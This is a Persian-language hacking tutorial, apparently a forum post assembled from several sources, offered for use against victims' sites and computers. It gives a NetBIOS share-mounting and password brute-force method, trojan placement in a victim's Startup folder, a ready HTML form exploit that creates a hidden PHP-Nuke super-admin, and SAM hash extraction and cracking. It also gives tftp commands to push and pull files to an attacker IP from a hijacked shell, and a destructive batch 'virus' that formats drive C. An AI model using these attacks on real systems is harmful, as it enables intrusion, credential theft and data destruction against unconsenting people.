سلام دوستان
اميدوارم از اين آموزش سو استفاده نكنيد
خیلی ها دوست دارن سایت هک کنن ولی به علتهای مختلف یا نمیتونن وقت بزارن روش یا سایت امنیتش بالاست یا فرد دانش هک کردن رو نداره و... حالا در این درس به آموزش چندین روش برای آموزش هک متداول ترین فروم که PHP-Nuke است بپردازیم.
اول باید خصوصیات سایت را بررسی کنید و اولین خوصوصیات ضروری پی اچ پی نوک بودن آن هست! به روش های مختلف هک کردنه یوزر ادمین یا ساختن ادمین مخفی را یاد بگیرید.
در هر سایت نوک یک فروم قرار دارد و همینوطور که میدانید در فروم یک یا چند نفر به cp (مخفف کنترل پانل) دسترسی دارند. شاید از همین فکر چیزی فهمیده باشید. پس در هر تالار چندین کاربر (user) وجود دارد (بستگی به کیفیت تالار دارد) و مدیر هم در بین این کاربران هست و نا کاربری او فاحش هست و می توانید آن را به راحتی ببینید.با این توضیح شما دو روش را برای هم حدس زدید. درسته ! می گن هک سایت سخته ولی اونقدرا هم سخت نیست حتی با ماجیک هم میشه سایت هک کرد! پس فعلا با ماجیک هک می کنیم تا برسیم به جاهای پیشرفته! حالا بايد به سيستم طرف براي نصب تروجان نفوذ كنيد و نت بايوس بهترين راه هست!
نفوذ به سيستم از طريق NetBios
-------------------------------------------
با یاد گیری این مقاله شما میتونید یک درایو از سیستم قربانی رو به وسیله نت بایوس Share کنید و هر کاری که خواستید توی اون درایو انجام بدید ( فایل بذارید ، بردارید ، پاک کنید و ... ) البته من این مقاله رو به صورت تصویری هم تو سایت گذاشتم ، می تونید دانلود کنید.
خب بریم سره موضوع اصلی:
اول باید IP سیستم مورد نظر رو پیدا کنید ( تو سایت قبلا اموزش دادم ) ، بعد از منوی Start قسمت Run برید و تایپ کنید CMD. بعد از اینکه وارد CMD شدید این دستور رو بنویسید:
Net use x: \\IP\DriveName$
به جای X میتونید هر حرفی رو بنویسید به غیر از حروفی که اسم درایو های خودتون هست.مثلا اگه درایو G داشته باشید ، از حرف G نمیتونید استفاده کنید. به جای IP هم ای پی مورد نظر رو که می خواهید بهش نفوذ کنید رو بنویسید. به جای DriveName هم اسم درایو رو بنویسید. اگه مثلا میخواهید درایو C رو Share کنید ، حرف c رو بنویسید.یک نمونه از دستور رو ببینید:
Net use x: \\80.191.191.39\c$
اگه کمی شانس داشته باشید بدون در خواست User Name و Password درایو Share میشه و این پیغام رو مینویسه: The command completed successfully اما اگه از شما در خواست یوزر نیم و پسورد کرد به جای یوزر نیم کلمه Administrator رو وارد کنید که برای ویندوز XP و 2000 تعریف شده است ( البته معمولا تو یه خط یوزر نیم رو میده ).پسورد هم میتونید با یه برنامه مثل بروتوس( Brutus ) پیدا کنید.
اگه شما درایوی رو Share کرده باشید که ویندوز قربانی هم تو همون درایو نصب شده باشه ، می تونید سرور یک تروجان رو تو پوشه Startup تو قسمت Start Menu کپی کنید و منتظر باشد قربانی ریستارت کنه تا فایل سرور اجرا شه و شما به راحتی با تروجان به سیستم وارد بشید. ( یادتون باشه که سرور رو فقط کپی کنید چون اگه اجرا کنید در واقع تو سیستم خودتون اجرا کردید ) (نويسنده : فرشاد عزيز)
حالا که یک تروجان در ستارت آپ طرف کپی شد و پسورد او را دریافت کردید.....
هر کاربر در هنگام ثبت نام در هر تالاری در سایت های نوک باید به اجبار ایمیلی برای خود انتخاب کند که پسورد انتخاب شده به آن ایمیل ارسال شود. ایم خودش یک باگ امنیتی هست و لازم نیست که حتما اکسپلویتی جولوی شما باشد! (ولی بعد از این روش با اکسپلویتی برای هک نوک هک آشنا می شوید)خوب به قسمت (رمزعبور را فراموش کردم) یا ( Forget PassWord ) بروید و ایمیل طرف را وارد تا پسورد فرستاده شود. (این عمل در صورتی اتفاق می شود که نام کاربری بوسیله ی یک ایمیل پشتیبانی شود که در اغلب فروم ها اینجوری هست) حالا که پسورد کاربر مدیر و یا همان شناسه مدیر را گرفتید به منطقه ی کنترل (کنترل پانل) نفوذ کنید و شناسه ی حای را پاک کرده و شناسه ای بسازید و index را عوض کنید. قبل از اینکه ورود به کنترل پانل را به شما یاد دهیم بهتر استروش دیگری برای ساخت ادمین مخفی ( hide admin ) یاد بگیریم! اول باید بفهمیم که نوک چیست؟
پی اچ پی نوک انواع مختلفی دارد که از سال ۲۰۰۱ به ورژن های مجانی تبدیل شد و برای همین شهرت زیادی پیدا کرد در ابتدا تیم های آمریکایی و پاکستانی ورزن های ۶.۸ . ۶.۹ را مجانی کردند و ایرانی های عزیز نیز برای هموطننانشان از ورژن ۷.۳ تا ۷.۸ (آخرین نسخه) را ترجمه کردند و نوک های فراسی را بوجود آوردند. مثل گروه معروف IranNuke
این اکسپلویت هم به شما کمک می کند که در کنترل پانل سایت نوک وارد شوید و شناسه ی مدیرتی برای خود بسازید. این اکسپولیت برای نوک ۷.۳ تا ۷.۷ هست و نوک ۷.۸ را فقط اگر روی لکال هاست باشد هک می کند.
--------------------------------------------------------------------------------
<form name="mantra" method="POST" action="http://www.sitename.com/admin.php"> USERNAME: <input type="text" name="add_aid"><br> NOME: <input type="text" name="add_name"><br> PASSWORD: <input type="text" name="add_pwd"><br> E-MAIL: <input type="text" name="add_email"><br> <input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox"><br> <input type="hidden" name="add_radminsuper" value="1"><br> <input type="hidden" name="op" value="AddAuthor"></p> <input type="submit" name="Submit" value="Create Admin"><br> </form>
--------------------------------------------------------------------------------
خوب در قسمتی از کد نوشته شده:
http://www.sitename.com/admin.php به جای sitename نام سایت را بنویسید و آن را با پسوند html ذخیره سازید.
به این صورت : exploit.html
حالا روی آن کلیک کنید و صفحه ای همانند صفحه ی عضویت در آن تالار باز می شود! (حالا بستگی دارد که چه چیز هایی از شما درخواست کند) حالا آن را که پر کردید در زیر آن Create Admin را کلیک کنید و مستقیما به
http://www.sitename.com/admin.php میرید و اونجا با یوزری (شناسه ایی) که ساختید وارد شوید! حالا شما هم سایت پی اچ پی نوک هک کردید!
موفق باشید
هک کردن پسوورد admin
كلا روش هاي زيادي براي پيدا كردن پسورد ادمين ويندوز هاي NT 2K & XP وجود داره اما من ترجيح مي دم از روش كرك SaM پسورد را بدست بيارم متاسفانه بزرگ ترين ضعف امنيتي مايكروسافت در SaM بر مي گرده به Encrypt اين فايل ها
كه با متد 64bit انكريپت و يا بهتره بگم Hash شده و اين به كركرها اجازه رو مي ده كه با يك مقدار دقت حتي بتونه به خوبي هارد ديسك هايي را كه با Format NTFS قالب بندي شده و SaM فايل ها Encode شده اند رو Decode كنند!!
اما ما براي بدست آوردن فايل هاي SaM بايد دو نوع فايل رو در نظر بگيريم
يكي SaM Registry و ديگري System Registry كه در هنگام عمليات كرك به اين دو فايل مهم كه در مسيرهاي
CODE
c:\windows\system32\config\SAM
و
CODE
c:\windows\system32\config\system
مي باشندنياز داريم البته اين دو فايل به طور كاملا پيچيده اي Encode شده اند كه اگر ما سيستم رو با ويندوز بالا بياريم نمي توانيم اين دو فايل رو از پوشه هاي بالا بدست بياريم و حتما بايد نياز به سيستم عامل Dos و البته يك برنامه كمپرس گر كه Dos رو پشتيباني كنه داريم من برنامه كمپرس گر PK Zip 2.50 رو پيشنهاد مي كنم !!!
http://garbo.uwasa.fi/pub/pc/arcers/pk250dos.exeشما اين برنامه رو دريافت كنيد و اجرا كنيد محتويات كمپرس گر UnZip مي شود كليه فايل هاي UnZip شده را در يك فلاپي ديسك قرار دهيد و فلاپي را بيرون بياوريد!
مرحله بعد:
خوب با سيستم Dos بالا مي آيم يا يك Startup ديسك فرقي نمي كنه مهم اين هست كه با Dos سيستم رو بوت كنيم!!
البته دقت كنيد كه اگر با Startup مي خواهيد سيستم رو بالا بياوريد محتويات فايل MsConfig.sys حتما اين موارد رو داشته باشد
CODE
DEVICE=himem.sys
dos = high, umb
چك كنيد در ديسكت Startup خود حتما فايل himem.sys باشد اگر نيست مي توانيد از اينجا دريافت كرده و به ديسك Startup اضافه كنيد
Download himem.sys
http://www.techadvice.cc/files/s29k...-Disk/himem.sysما با اين كار ايمان پيدا مي كنيم كه اگر با دسكت Startup سيستم رو بوت مي كنيم حتما RAM بالاتر از 32MB رو پشتيباني مي كنه!!
حال وقتي سيستم رو با Dos بوت كرديد ديسكت كمپرس گر PkZip را داخل سيستم گذاشته و عبارت زير را تايپ كنيد!!
CODE
pkzip c:\Crack.zip c:\windows\system32\config\SAM c:\windows\system32\config\system
دقت كنيد بين دو كلمه Sam و C: يك جاي خالي يا Space وارد كنيد بعد Enter كنيد!!
درواقع ما با اين دستور دو فايل مهم SaM Registry و System Registry رو در پوشه هاي بالا استخراج كرده و به صورت فشرده در درايو C با نام Crack.zip ايجاد كرديم!!
البته هنگام عميات اجرا سيستم از ما كمك مي خواهد مه عرض مي كنم!
وقتي دستور بالا رو داديم بعد از يك دقيقه سيستم خطاي command.com مي ده شما بايد ديسكت كمپرس گر را در آورده و ديسكت Startup رو بزنيد و براي ادامه كليدي را بزنيد و سپس تمام !!
فايل Crack.zip در درايو C ايجاد شد!!
حالا سيستم رو Restart مي كنيم و با ويندوز بالا مي آوريم با Winzip فايل مورد نظر يعني Crack.zip را در پوشه اي UnPack مي كنيم حالا نياز به يك كركر قوي
يعني برنامه ProActive Windows Security Explorer داريم شما مي توانيد اين برنامه رو از اينجا دريافت كنيد!!
Download SaM Cracker
http://www.persianhacker.net/downlo...tion=file&id=30خوب اين برنامه رو باز مي كنيم در كادر وسط Registry Files رو تيك مي زنيم و دكمه Dump رو فشار مي دهيم صفحه اي باز شده و از ما محل دو فايل Sam Registry و SystemRegistry به ترتيب در Browse پايين و بالا مي خواهد مسير دو فايل را از پوشه Unpack شده Crack.zip انتخاب كرده و در نهايت Dump رو يك بار ديگر مي زنيم و پس از يك ساعت تمام!!
پسورد به نمايش در مي آيد!!!
من هيچ گونه مسوليتي در قبال اين آموزش را به عهده نمي گيرم
در ادامه اين مطلب به زودي نحوه بدست آوردن SaM فايل ها براي سيستم هايي كه هارد ديسكي دارند كه درايوهايشان با فرمت NTFS قالب بندي شده اند رو مي گم
يادم رفت يك چيزي رو بگم مي تونيم از روش Cain و البته كركر قدرتمند LC5 استفاده كنيم منتها به علت .... بنده نتونستم LC5 كرك شده رو گير بيارم و پولي بود
موفق باشيد!! منبع پی سی ورد تایپیک آموزش
-------------------------------------------------------------------------------------------------------
نفوذ به كمك نرم افزار
وقتی که ما از یک Server و یا یک Client با استفاده از باگ آن (بطور مثال Lsass ,Dcom ,IIS ,Apache,Mysql ,...) یک سطح دسترسی (Shell ) می گیریم می تونیم اونجا مثل Command pormpt سیستم خودمون کارائی انجام بدیم و لی برای ارسال و دریافت فایل باید از tftp استفاده کنیم .کلاینت این برنامه در شاخه ی System32 همه ی سیستم عامل های windows هستش و شما می تونید با اجرا کردن tftp که از اینجا میتونید داونلودش کنید در سیستم خودتون نقش Server رو بازی کنید و چون به کلاینت اون دسترسی دارید بهش دستور ارسال و دریافت از Server تون که تو سیستم شما در حال اجراست رو بدید (یک ارتباط Client & ُServer ای )
خوب برای شروع این کار بعد از DowanloadکردنTftpاز اینجا فایل tftpd32.exe رو از توش اجرا کنید و قتی که باز شد
می تونید ip خودتون رو اونجا ببینید اگه اولش 192 داشت یا به بیانی Unvalid بود برین اینجا و ip valid خودتون رو ببینید چون به این ip احتیاج داریم .بعدش دکمه ی Browse رو تو tFtp بزنید و به طور مثال دایرکتری Desktop رو بهش بدید و بعدش show Dir رو تو برنامه بزنید و فایلی رو که میخواین به سیستم طرف انتقال بدین رو انتخاب کنید مثلآ Server.exe
خوب حالا برید تو shell ای که ازش گرفتین و به tFtp اون دستور بدید که Server.exe رو بگیره برای این کار از این دستور استفاده کنید Tftp -i 62.32.45.67 get server.exe که این ip همون ip ای هستش که از تو سایت گرفتیم (ip خودتون) دستور get برای اینه که به tFtp اون بگه فایل رو بگیره . شما در هر دایرکتری در سیستم طرف که باشید این فایل همون جا کپی مس شه و تو shell مینویسه Transfer Successful
حال برای اینکه بتونیم فایلی رو از سیستمش بگیریم باید بریم تو همون شاخه ای که اون فایل هست تو shell بعد اونجا بنویسیم
tFtp -i 62.32.45.67 post aks.jpg با این دستور فایل ( عکس و برنامه و ..) رو که از سیستم اون برای شما می فرسته که درصد فایل های ارسالی و دریافتی تو tFtp قابل مشاهده هستش
این روش ارسال و دریافت رو برای شلی که با iRcHaTaN Ps 7.1 از سیستم قربانی میگیدید هم میتونید استفاده کنید
برای ارسال: Tftp -i 62.32.45.67 get server.exe
برای دریافت: Tftp -i 62.32.45.67 post server.exe
----------------------------------------------------------------------------------
ساخت يك ويروس
ابتدا یه فایل Note Pad باز کنین و نوشته های کادر زیر رو بصورت کامل توی فایلی که ساختین کپی کنین ، بعد این فایل رو با پسوند bat ذخیره کنین ( به این صورت که از منوی File ، گزینه Save As رو انتخاب کنین و بعد از گذاشتن اسم مورد نظر در انتهایش ، عبارت bat. را قرار دهید تا فایل با پسوند bat ذخیره شود ) ... حالا ویروس شما آماده است ... امیدوارم رو سیستم خودتون بازش نکنین ...
@echo off
call attrib -r -h c:\autoexec.bat
echo @echo off >c:\autoexec.b
echo format /autotest c:/q>nul
call attrib +r +h c:\autoexec.ba
exit
</body>
</html>
</body>
</html>
</body>
</html>
</body>
</html>
</body>
</html>
=============================================
معرفی روش هايی که توسط اونها قربانيتون رو هيچ وقت گم نميکنيد!!!!!!!
این دفعه برای شما دوستان می خواهم درباره متد یا روشی صحبت کنم که شما دیگر قربانی خود را گم نمی کنید ؛ البته به هیچ وجه منظورم اسب تروا و .... نیست و نیازی به نصب هیچ برنامه خاصی هم ندارد ، البته هدفم بیشتر درباره مبحث IP های دینامیک و رفع مشکل آنها است .
شاید شده تا به حال به یک کامپیوتر نفوذ کرده باشید ولی فهمیده باشید که IP آن استاتیک نیست (توسط دستور nslookup ) و آن ماشین برای شما ارزش زیادی داشته باشد ! این قضیه برای من چند دفعه تکرار شده است حتی به وضع فجیع تر ؛ یادم می آید که وقتی به یک شبکه نفوذ کرده بودم (فکر بد نکنید ، خودشان خواسته بودند !!) هدفم یک ماشین بود که اپراتور (یک چیزی تو مایه های مدیر ) از آن برای چک کردن سیستم و رفع مشکلات مدیریتی و ... استفاده می کرد ؛ آن ماشین IP دینامیک داشت و البته هر 7-8 دقیقه باز هم تغییر میکرد کار با آن خیلی مشکل بود ، چون نمی شود روشها را روي آن حتی تست کرد تا سوراخی پیدا کرد ، البته هیچ سرویسی هم ارائه نمی داد ، ما یک جور هایی به آن دست پیدا کردیم اما نمیتوانستم دسترسی را نگه دارم و ... ؛ خوب حالا شما قضیه را دریافتید و با مشکل آشنا شدید ؛ برای رفع این مشکل ما یک کار ساده کردیم و آن هم استفاده از Dynamic DNS بود! البته ابزارهایي هم وجود دارد که صلاح نمی بینم فعلا نام ببرم ! ولی یک راه حل بسیار خوب استفاده از سایتهای زیر است :
1.
http://www.dyndns.org 2.
http://www.tzo.com 3.
http://www.dhs.orgاین را هم اضافه کنم که شما در این سایتها ثبت نام کرده و بعد از گذراندن مراحل ثبت نام برای ماشین قربانی یک نام اختصاص می دهید ، و با وارد کردن آن نام در قسمت URL مرورگر شما به سمت قربانی هدایت می شوید حتی با اینکه IP قربانی تغییر کند !! البته در شرایطی که کلاس آن تغییر نکند !!!
با استفاده از اين روش ها کارهای خيلی جالبی ميشه انجام داد
بقيشو خودتون پيدا کنيد
---------------------------------------------------------------------------------------
لطفا" نظر بدین 
می گم این عمومیش مال کیا شد آخر 
